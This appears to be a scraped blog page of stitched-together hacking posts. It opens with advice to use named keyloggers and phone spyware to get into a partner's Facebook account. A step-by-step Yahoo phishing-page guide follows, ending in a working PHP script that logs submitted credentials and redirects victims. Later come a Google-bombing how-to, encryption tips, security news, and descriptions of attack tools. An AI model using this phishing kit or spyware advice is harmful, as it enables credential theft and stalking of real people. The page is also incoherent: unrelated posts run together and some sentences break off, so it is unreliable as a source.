Category: Hacking Tools


In this post I will tell you the Top 3 Methods Which hackers use to Hack Facebook passwords and some counter measures also to help you protect your Facebook account from Hackers. In my previous posts I have mentioned lots of techniques to Hack a Facebook Password but In this article I will highlight the most effective ones.e
A lot of people contact me about suspecting their boyfriend/girlfriend of cheating, but they are on Facebook and ask why I haven’t written a guide for hacking Facebook passwords

The following are the methods used by most Hackers to Hack a Facebook Password

    Keyloggers
    Mobile Phone Spying
    Phishing

Keyloggers(Spying Softwares)
Well keylogging is the widest and most commonly used Technique to Hack a Facebook Password. A keylogger is a piece of software used to record keystrokes( Keys that were typed) on a computer.Keyloggers support two types of monitoring depending upon their efficiency and quality

1. Local Monitoring
2. Remote Monitoring

Local Monitoring keyloggers are used to monitor a personal computer. where as Remote Monitoring keyloggers are used to monitor both local pc’s as well as remote pc’s.
With my experience of over 4 years in the field of Ethical Hacking and security I have tested 50+ keyloggers and spy softwares and have found these two the best:
1. Sniperspy
2. Winspy

If you are confused to choose the right keylogger read my article on which spyware keyloggers software to Choose?

Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.

The most popular Mobile Phone Spying softwares are:
1. Mobile Spy
2. Spy Phone Gold

If you are confused to choose a Mobile Phone Spying software then Read my Article on Which Cell Phone Spy Software to Choose?

Phishing or Fake Login Pages
Studies show that over 70% of the internet accounts get hacked with this method how ever Making a Fake login pages demands the skill of PHP Coding and HTML too. In Phishing a hacker creates a Fake login page which exactly resembles to the Facebook Page and then makes the victim login through that page and thus the victim gets his/her Facebook account Hacked. To Learn more about Facebook Phishing refer my post How to hack Facebook Password

If you have any questions regarding this article feel free to comment!

Advertisements

In this post I’ll show you to hack yahoo using fake login page to hack yahoo in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.

Here is a step-by-step procedure to create a fake login page and hack yahoo.

Hack yahoo using fake login page – Procedure

STEP 1.
Go to the Yahoo login page by typing the following URL.

mail.yahoo.com

STEP 2.

Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.

STEP 3.
Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

STEP 4.
Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML

STEP 5.
Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif”

Rename the above link into

src=”files/ma_mail_1.gif”

Repeat the same procedure for every file contained in the folder by name “files“.

Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.

STEP 6.
Now search for the following term

action=

you will see something like this

action=https://login.yahoo.com/config/login?

Edit this to

action=http://yoursite.com/login.php

Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

STEP 7.
Now you have to upload your yahoo.HTML, files folder and login.php to

yoursite.com Root folder

NOTE: Make sure that your host supports PHP

Tip: 110mb.com supports PHP

STEP 8.
Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password

NOTE: The concept here is to save the password.The format is not important here.

STEP 9.
Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
here is the login script which i am posting due to large number of request

header(“Location: http://WEBSITE “);
$handle =

fopen(“pass.txt”, “a”);
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, “=”);

fwrite($handle, $value);
fwrite($handle,

“\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;

Your e-mail holds the bulk of your online information. Unfortunately, that information is out in the open. That is, unless you decide to encrypt it so only you can determine who can read it.

The growth of the internet, and e-mail in particular, has given rise to numerous types of encryption software for the secure transmission of information. There are various reasons for wanting to encrypt your e-mail today:
Client confidentiality. You need to transmit sensitive commercial information over e-mail, and you don’t want people who sneak onto or steal your computer to compromise your clients’ privacy.
You want to avoid prosecution by the government. Perhaps you you live under an authoritarian regime that is trying to infringe on your civil liberties. We’ll give you the benefit of the doubt here.
You are a business owner or the head of an organization targeted by digital con artists and you need a system to authenticate your identity amongst your clientele.

What You’ll Need

Encryption on the internet is not unlike your typical lock and key combination. What you’ll need to do is choose the lock, in the form of encryption platform, and then generate a key to lock (encrypt) or unlock (decrypt) your data.
Choose your lock

  • There are various encryption platforms. Some popular standards include:
    Advanced Encryption Standard (AES)
    Triple Data Encryption Algorithm (TDEA), X.509
    Various flavors of Pretty Good Privacy (PGP), including Open PGP and Gnu Privacy Guard (GPG)
  • Because encryption ought to be tightly integrated with your e-mail client, the standard you end up using is probably going to be determined by what works with your e-mail client of choice. For example, Microsoft Outlook comes with TDEA encryption, Apple’s Mail supports X.509 encryption, and there is a GPG add-on for Firefox that works with Google’s GMail.

    Create your keys

    To get started with encryption, you need to create an encryption key pair, which is like a digital signature and pass code. Your e-mail client or stand-alone encryption software might be able to create these keys for you or you may be directed to the web site of a certificate authority such as Thawte or Verisign to create and store your key.

    Enter your full name, your e-mail address, and create a pass phrase that will ensure that only you can use your key. Your pass phrase should be fairly long and complicated – you shouldn’t use names, dates, addresses, or anything else that can be easily guessed at. One simple method is to use mondegreens; you know, those misinterpreted words you used to sing along with, until you learn what the real lyrics really are and become terribly embarrassed. For example, Jimi Hendrix’s “‘scuse me, while I kiss this guy.”

    Certificate authorities create a key pair of both a private and a public key for you. The only people who should have access to your private key are you and the certificate authority; this key is what allows you to encrypt files and decrypt files meant just for you. The public key is freely distributed to anyone you correspond with; it allows other people to check your digital signature to confirm that you are the actual author, and it allows them to encrypt files and messages that only you can decrypt. Depending on the encryption standard you are using, you may have to send people your public key by attaching a file, or it may be automatically downloaded from the certificate authority’s public key server.

    Start encrypting!

    The two most common functions of encryption software are Signing and Encrypting. Signing an e-mail lets anyone who has access to your public key decrypt the message, and serves to confirm that you are the original author. Signing is useful in situations where unsavory characters may be sending out fraudulent information in your name and you need people to know what information is really coming from you. Encrypting scrambles plain text or file attachments and only allows the intended recipient to access them. Encrypted files and messages are also signed as a matter of course, so the recipient can also confirm that the message they are decoding did actually come from you.

    In the Future

    As computers get more powerful, it becomes easier to crack encryption. In fact, one of the very first digital computers ever created, Colossus, was used to decrypt German codes during World War II. Typically as code breakers get more powerful, encryption systems just use longer and longer codes to slow down brute-force attempts to guess them: right now most desktop encryption software offers up to 4,096-bit encryption.

    An entirely new system of encryption is being developed that takes advantage of the principles of quantum mechanics: quantum encryption creates an entangled key pair of qubits that is shared among two parties. These entangled qubits allow the two parties to share information securely, and – due to the peculiar role observation plays in quantum mechanics – also alerts them if anyone is attempting to eavesdrop on their secure channel. Quantum cryptography is already running on experimental military and university communication networks, and if the example of the World War II code-breaking machines is any indication, it’s only a matter of time until the technology trickles down to consumers.

    Google bombing involves manipulating search engines’ contextual search methodologies to cause a certain search phrase to point to an unexpected page, usually for comedic or satirical purposes. A recent example of a Google bomb happened in January 2008, when the search phrase “dangerous cult” returned the Chuch of Scientology home page as the top search result.

    Google bombing — also known by the more generic term “link bombing” — works with any search engine using a relevancy algorithm similar to Google’s. For example, run a search for “miserable failure” in Yahoo Search. You’ll see prominent links to President George W. Bush’s biography at whitehouse.gov at or near the top of the list.

    The heart of the system is Google’s PageRank algorithm, as well as equivalent competing technologies. The PageRank system assigns a numeric score of 0-10 for each page on the web. Google derives a page’s ranking from the PageRank scores of all other pages that link to it.

    The key to Google bombing is to generate outgoing links to your target from highly-ranked sites. Get enough highly-ranked sites pointing to your target using the same phrase, and you’ll push the target site to the top of the list of search results one sees when entering that mischievous phrase.

    Here’s how to do it.

    Step 1: Plan Your Assault

    You’ll need a lot of friends who can be convinced to cooperate. The number of links you need depends on a number of factors, including the PageRank of the sites the phrase is posted on as well as the precise phraseology.

    Alternatively, you can do all the linking yourself, but you would need at least a few hundred links on separate domains to get the desired result.

    Typically, the victim is someone you and a bunch of other people dislike. The more high-profile the target, the better your chances of being seen and making your point.

    Unlike the good old days, however, you can no longer google bomb for any phrase you like. The google update of Jan 07 (referenced below) means that it’s necessary to choose your phrase from words which already appear on the page in question. For example, the recent google bomb of the scientology site for ‘dangerous cult’ only worked because the word ‘cult’ was mentioned on the page.

    Step 2: Generate a Whole Lotta Links

    The more highly-ranked links search engines detect, the greater rank the chosen site will receive. Typical links include the URL of the target site, with the key phrase comprising the anchor text of the link. A link’s anchor text is the words that appear between the and the closing tag in a link.

    Tip: The more obscure the linked phrase, the better. If the phrase you choose is a popular one, you may need more links than an obscure phrase.

    The total number of links depends on a lot of factors, but think in terms of hundreds or thousands, not millions. For example, the hacker radio show Off The Hook successfully Google bombed themselves with the search term “blank expressions.” They peaked as the 6th-ranked site for that phrase with a total of about 350 links.

    Step 3: Tell Everyone

    What’s the use of link bombing if no one notices? After the bomb takes hold, publicize it so ordinary citizens learn all about your move. Use a social networking site. That is, you could generate web traffic with Twitter.

    Tips & Tricks
    In January 2007, it was announced that Google would be taking steps to limit the effectiveness of Google bombing. It’s subsequent algorithm tweak rendered most bombs ineffective. Rather than eliminate them altogether, Google directed search queries to discussion pages describing the bomb and Google’s reasons for defusing them. Furthermore, Google is known for manually altering PageRank scores for various reasons, including succumbing to political pressure. Many Google bombs have been suppressed for public relations reasons.
    Yahoo, AltaVista and other search engines have not announced any similar measures, so many older bombs that no longer work with Google still work with these other engines.
    Also, it is possible to Google bomb for commercial or self-promotional purposes. Commercial link bombing, also known as “spamdexing,” involves driving traffic to sites by the massive creation of links via bots, usually targeting the comment fields of blog posts.

    Another critical security flaw has been discovered in Microsoft Windows’ operating system software and about forty other Microsoft programs. Security experts have found that malicious code can be injected easily and remotely, and that the OS is very vulnerable to remote-code execution attacks that are trivial to carry out.

    H.D. Moore, security expert and chief architect of the Metasploit Project says “The security hole involves the method in which Windows loads so-called “safe” file types from remote network locations, and is almost identical to one that Apple removed in its iTunes system last week.”

    Moore added that the hole is “trivial” to remote exploits, but wasn’t authorized to provide additional details about techniques or other vulnerable Microsoft applications.

    According to a more detailed advisory for the iTunes fix, the “binary planting” vulnerability allowed potential hackers to execute malicious code on Windows computers by getting the media player to open a file located on the same network share as a maliciously designed DLL file that would be residing directly on the affected machine.

    The security bulletin, which was written by ACROS Security states “All a remote attacker has to do is plant a malicious DLL with a specific name on a network share and get the user to open a media file from this network location in iTunes, which should require minimal reconfiguration in most cases.”

    “Since Windows systems by default have the Web Client service running – which makes remote network shares accessible via Web-DAV – the malicious DLL can also be deployed from an Internet-based network share as long as the intermediate firewalls allow outbound HTTP traffic to the Internet,” the advisory suggests.

    In a prepared statement, Microsoft said it is currently investigating the report.

    Moore added that Internet users can protect themselves against such attacks by blocking outbound SMB connections on ports 445 and 139 and on Web-DAV.

    That will stop attacks that originate over the Internet right in their tracks, but users may still be susceptible to LAN-based attacks where an attacker has planted malicious DLLs on a network share.

    In such methods, it is similar to workaround advice given for the Windows shortcut flaw that Microsoft patched earlier on Aug. 10.

    Last month, Siemens said it had concocted a program it is making available for detecting and disinfecting malware and viruses attacking its complex power-grid management software.

    Siemens’ software also controls critical oil & gas refineries and manufacturing plants. The German enginerring firm warns that customers who use the infected software could have the devastating effect of disrupting whole power grids in the U.S., Canada, South America, Europe and Asia.

    Siemens began distributing SysClean, a malware and virus scanner made by Trend Micro. It has been updated to remove StuxNet, a worm that spreads by exploiting two separate security flaws in Siemens’s SCADA (supervisory control and data acquisition) software and every supported version of Microsoft Windows.

    “As each plant is individually configured in a very unique method, we cannot rule out the possibility that removing the malware may affect your plant in any way,” the Siemens advisory said.

    The company also advised customers to keep the scanner updated at all times because “there are already some new derivative versions of the original virus around, and we are trying our best to mitigate these and other security issues.”

    Recently, Siemens has come under blistering criticism for not removing the security vulnerability two years ago, when, according to Wired.com, the default password threat first came to light.

    So far, StuxNet has infected the engineering environment of at least one unidentified Siemens customer, and has since been eliminated, Siemens said.

    The company added that there are no known infections of production plants to this day, but warns that there’s always the possibility that some could be discovered in the near future.

    The worm spreads whenever a system running Siemens’s SCADA software is attached to an infected USB stick. The attacks use a recently documented vulnerability in the Windows shortcut feature to take control of customer’s personal computers in the workplace. Once there, the worm takes advantage of default passwords in WinCC, the security-prone, problematic SCADA software provided by Siemens.

    Siemens said it has updated WinCC to fix the security vulnerability. For its part, Microsoft has issued a stop-gap fix but hasn’t said yet if and when it plans to patch the the Windows security flaw.

    Chris Wysopal, CTO of application security tools firm Veracode says “Siemens has put their own customers at risk with this egregious vulnerability in their software. Worse, is all the many customers from around the world who purchased the software not knowing of any of its many security risks.”

    Hacking with Dignity

    Thanks to the media, the word “hacker” has gotten a bad reputation. The word summons up thoughts of malicious computer users finding new ways to harass people, defraud corporations, steal information and maybe even destroy the economy or start a war by infiltrating military computer systems. While there’s no denying that there are hackers out there with bad intentions, they make up only a small percentage of the hacker community.

    The term computer hacker first showed up in the mid-1960s. A hacker was a programmer — someone who hacked out computer code. Hackers were visionaries who could see new ways to use computers, creating programs that no one else could conceive. They were the pioneers of the computer industry, building everything from small applications to operating systems. In this sense, people like Bill Gates, Steve Jobs and Steve Wozniak were all hackers — they saw the potential of what computers could do and created ways to achieve that potential.

    A unifying trait among these hackers was a strong sense of curiosity, sometimes bordering on obsession. These hackers prided themselves on not only their ability to create new programs, but also to learn how other programs and systems worked. When a program had a bug — a section of bad code that prevented the program from working properly — hackers would often create and distribute small sections of code called patches to fix the problem. Some managed to land a job that leveraged their skills, getting paid for what they’d happily do for free.

    As computers evolved, computer engineers began to network individual machines together into a system. Soon, the term hacker had a new meaning — a person using computers to explore a network to which he or she didn’t belong. Usually hackers didn’t have any malicious intent. They just wanted to know how computer networks worked and saw any barrier between them and that knowledge as a challenge.
    ­

    ­­In fact, that’s still the case today. While there are plenty of stories about malicious hackers sabotaging computer systems, infiltrating networks and spreading computer viruses, most hackers are just curious — they want to know all the intricacies of the computer world. Some use their knowledge to help corporations and governments construct better security measures. Others might use their skills for more unethical endeavors.

    Zombie computers are computers that have been taken over by a hacker without the knowledge of the owner. See more ­computer pictures.

    ­Imagine that the Internet is a city. It would undoubtedly be the most remarkable and diverse city on the planet, but it would also be incredibly seedy and dangerous. You could find the world’s most comprehensive libraries there alongside X-rated theaters.

    Inside this city, you would also discover that not everyone is who they seem to be — even yourself. You might find out that you’ve been misbehaving, although you don’t remember it. Like the unwitting agent in “The Manchurian Candidate,” you discover you’ve been doing someone else’s bidding, and you have no idea how to stop it.

    A zombie computer is very much like the agent in “The Manchurian Candidate.” A cracker — a computer hacker who intends mischief or harm — secretly infiltrates an unsuspecting victim’s computer and uses it to conduct illegal activities. The user generally remains unaware that his computer has been taken over — he can still use it, though it might slow down considerably. As his computer begins to either send out massive amounts of spam or attack Web pages, he becomes the focal point for any investigations involving his computer’s suspicious activities.

    ­The user might find that his Internet Service Provider (ISP) has cancelled his service, or even that he’s under investigation for criminal activity. Meanwhile, the cracker shrugs off the loss of one of his zombies because he has more. Sometimes, he has a lot more — one investigation allegedly discovered that a cracker’s single computer controlled a network of more than 1.5 million computers .

    What is bluejacking?

    Have you ever been doorbell ditching before? The point of the prank is simple: Sneak up to someone’s front door, knock loudly or ring the doorbell, and, instead of greeting whoever answers the door, run away and hide somewhere nearby. The joy of doorbell ditching is, of course, reveling in the homeowner’s confusion and rolling with laughter under the security of his nicely trimmed bushes. Although the game might get you in a bit of trouble if you happen to incite the ire of a cranky neighbor, it’s mostly a harmless joke on par with a prank phone call.

    For more technically inclined pranksters with access to Bluetooth technology, however, there’s the digital version of doorbell ditching and prank phone calls: Bluejacking. A kind of practical joke played out between Bluetooth

    Bluetooth technology operates by using low-power radio waves, communicating on a frequency of 2.45 gigahertz. This special frequency is also known as the ISM band, an open, unlicensed band set aside for industrial, scientific and medical devices. When a number of Bluetooth devices are switched on in the same area, they all share the same ISM band and can locate and communicate with each other, much like a pair of walkie talkies tuned to the same frequency are able to link up.

    Bluetooth technology users take advantage of this ability to network with other phones and can send text messages or electronic business cards to each other. To send information to another party, the user creates a personal contact name in his or her phone’s address book — the name can be anything from the sender’s actual name to a clever nickname.

    Bluejackers have devised a simple technique to surprise their victims: Instead of creating a legitimate name in the address book, the bluejacker’s message takes the place of the name. The prank essentially erases the “from” part of the equation, allowing a user to send any sort of comment he wishes without indentifying himself.

    For instance, if you’re sitting in a coffee shop and notice a fellow Bluetooth user sitting down to enjoy a cup of iced coffee, you could set up a contact under the name “Is your coffee cold enough?” After choosing to send the text via Bluetooth, the phone will search for other enabled Bluetooth devices; selecting one will send the unsolicited message to that device. A bluejacker’s crowning moment comes, of course, when the victim receives the message and expresses a mild mix of confusion and fear that he’s under surveillance.

    Bluejacking is imprecise, however. Searching for other Bluetooth-enabled hardware might turn up a list of devices labeled with a series of numbers and letters. Unless the bluejacker’s target has chosen to publicly identify his or her phone, or it’s the only Bluetooth phone in the area, the bluejacker may have a hard time messaging his or her target on the first try.

    INTERNET HACKER TOOLS

    Hackers are generally lazy but intelligent, which means they don’t like doing something boring that they can program the computer to do for them instead. As a result, hackers have unleashed a variety of tools designed to make their lives easier (but their victims’ lives more miserable). Some of these tools include scanners (to find open ports on vulnerable computers), remote Trojan horse programs (to take over a computer through the Internet), and password crackers (designed to exhaustively try out different password combinations until they finds one that works). To see what types of tools hackers may use against you, browse through the following:

    AOHell

    Released around 1995, AOHell  defined the standard for online harassment programs and quickly spawned numerous copycats for harassing other online services including CompuServe, Prodigy, and the Microsoft Network. Written in Visual Basic 3.0, AOHell was a relatively simple program that helped hackers send spoofed email, create phony credit card numbers for making fake AOL accounts, con AOL users out of passwords and credit card numbers, and send insulting messages to others in chat rooms.

    AOHell, the first and original online harassment tool.
    Although AOHell initially caused problems for America Online users, the program is now obsolete. Few hackers are currently developing AOHell copycat programs, preferring to channel their energy towards creating more sophisticated Internet hacking tools such as port scanners or harassment tools that cause chaos on IRC or in ICQ chat rooms.

    BO2K – Back Orifice

    With a name deliberately chosen to mock Microsoft’s Back Office program, Back Orifice caused a sensation when released in 1998 as one of the first remote access Trojan horse programs that could remotely control another computer over a phone line or through the Internet

    Back Orifice 2000 is the latest incarnation of the popular and ground-breaking remote access Trojan horse.
    Developed by a hacker group calling themselves the Cult of the Dead Cow, Back Orifice (http://www.bo2k.com) made headlines again in 1999 when it was released at DefCon 7.0 with improvements, including the option of adding plug-in programs written by others, and the complete C/C++ source code so that anyone could study and modify the program. Ironically when introduced at DefCon, the Back Orifice 2000 CD was infected by the Chernobyl (CIH) virus.

    Although Back Orifice still poses a threat to computers, the buzz surrounding BO2K has faded. Still, the program has spawned numerous remote access copycats programs that have improved upon the original Back Orifice design, and despite its age, Back Orifice still remains a favorite tool for hackers to probe computers connected to cable or DSL modems.

    Crack Whore

    One of the new breed of website hacking programs, Crack Whore uses a brute force/dictionary attack against a website to find the password to a legitimate account . Since so many people use weak, easy to guess passwords, programs like Crack Whore are surprisingly successful far more often than they should be!!

    Crack Whore probes a website for easily-guessed passwords to give a hacker access to a system.
    Once hackers have access to a legitimate account, they can either modify web pages and other data directly or attempt to burrow through the system and either gain access to additional accounts or elevate the current account to get greater access to the rest of the computer hosting a particular website.